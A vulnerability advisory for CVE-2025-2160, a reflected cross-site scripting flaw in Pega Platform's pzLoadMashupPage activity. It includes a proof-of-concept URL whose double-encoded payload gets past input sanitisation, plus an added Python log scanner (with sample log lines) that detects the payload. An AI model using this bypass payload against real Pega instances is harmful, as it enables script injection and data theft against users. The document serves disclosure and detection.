Research & Development

CVE ID: CVE-2025-2160

Vulnerability type: Reflected Cross-Site Scripting

CVSS score: 8.1 (High)

CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Product: Pega Platform

Affected versions: 8.4.3 to Infinity 24.2.1

Credits: Kacper Paluch, Maciej Włodarczyk, Jakub Sajniak

A Reflected Cross-Site Scripting vulnerability exists in Pega Infinity Platform versions 8.4.3 to 24.2.1. The vulnerability is located in the pyActivity pzLoadMashupPage module, which improperly sanitizes input from a GET parameter. The standard sanitization can be bypassed with a combination of URL encoding and Unicode escape sequences. Successful exploitation requires victim interaction (e.g., clicking a malicious link) and could allow an attacker to modify or exfiltrate data from the affected application.
Special thanks to Jakub Sajniak for their insights on identifying XSS vulnerabilities in the Pega Platform by searching for `pyActivity` modules within application JavaScript files.

Go to the following URL:
https://<pega_instance>/prweb/PRAuth/app/esg-comp/<uniqueID>*/!STANDARD?pyActivity=pzLoadMashupPage&Headers=%7b%22uniqueId123%22%3a%7b%22a%22%3a%5b%22b%22%2c%22c%5cu003c%2fscript%5cu003e%5cu003cscript%5cu003ealert(document.domain)%5cu003c%2fscript%5cu003e%22%5d%7d%7d
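The bypass works because the payload only becomes markup after two decoding steps (percent-decoding of the query string, then JSON `\uXXXX` escape decoding of the Headers value). The following log-side check, added here as an example and not part of the advisory, applies both layers before looking for tags; the access-log lines, host and unique ID are constructed, with the first line carrying the PoC query above.

```python
import json, re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the advisory): line 1 carries the advisory's PoC
# query with placeholder host/ID filled in, line 2 is a benign call to the same activity.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Sep/2025:10:00:00 +0000] "GET /prweb/PRAuth/app/esg-comp/ABC123*/!STANDARD'
    '?pyActivity=pzLoadMashupPage&Headers=%7b%22uniqueId123%22%3a%7b%22a%22%3a%5b%22b%22%2c%22c'
    '%5cu003c%2fscript%5cu003e%5cu003cscript%5cu003ealert(document.domain)%5cu003c%2fscript'
    '%5cu003e%22%5d%7d%7d HTTP/1.1" 200 4096',
    '10.0.0.6 - - [16/Sep/2025:10:00:01 +0000] "GET /prweb/PRAuth/app/esg-comp/ABC123*/!STANDARD'
    '?pyActivity=pzLoadMashupPage&Headers=%7b%22uniqueId123%22%3a%7b%22a%22%3a%5b%22b%22%5d%7d%7d'
    ' HTTP/1.1" 200 4096',
]
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
MARKUP_RE = re.compile(r'<\s*/?\s*[a-z]', re.IGNORECASE)  # an opening or closing HTML tag

def strings_in(obj):
    # Yield every string leaf of a decoded JSON document (keys are not yielded).
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, (dict, list)):
        for v in (obj.values() if isinstance(obj, dict) else obj):
            yield from strings_in(v)

def decoded_headers_markup(request_path):
    """First Headers string containing markup after BOTH decoding layers, else None."""
    query = parse_qs(urlsplit(request_path).query)  # parse_qs percent-decodes the values
    if "pzLoadMashupPage" not in query.get("pyActivity", []):
        return None
    for raw in query.get("Headers", []):
        try:
            doc = json.loads(raw)  # json.loads turns \u003c / \u003e into < and >
        except ValueError:
            continue
        for s in strings_in(doc):
            if MARKUP_RE.search(s):
                return s
    return None

def scan_log(lines):
    """Return (line_number, decoded_payload) for every flagged request in an access log."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and (found := decoded_headers_markup(m.group(1))) is not None:
            hits.append((n, found))
    return hits
```

Running `MARKUP_RE` over the raw log line finds nothing, since no literal `<` exists before both decodings; that is why a rule matching `<script` on the undecoded request misses this variant.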

  • 17-12-2024 - Vulnerability reported to vendor
  • 14-04-2025 - Security advisory is published by the vendor
  • 16-09-2025 - PoC published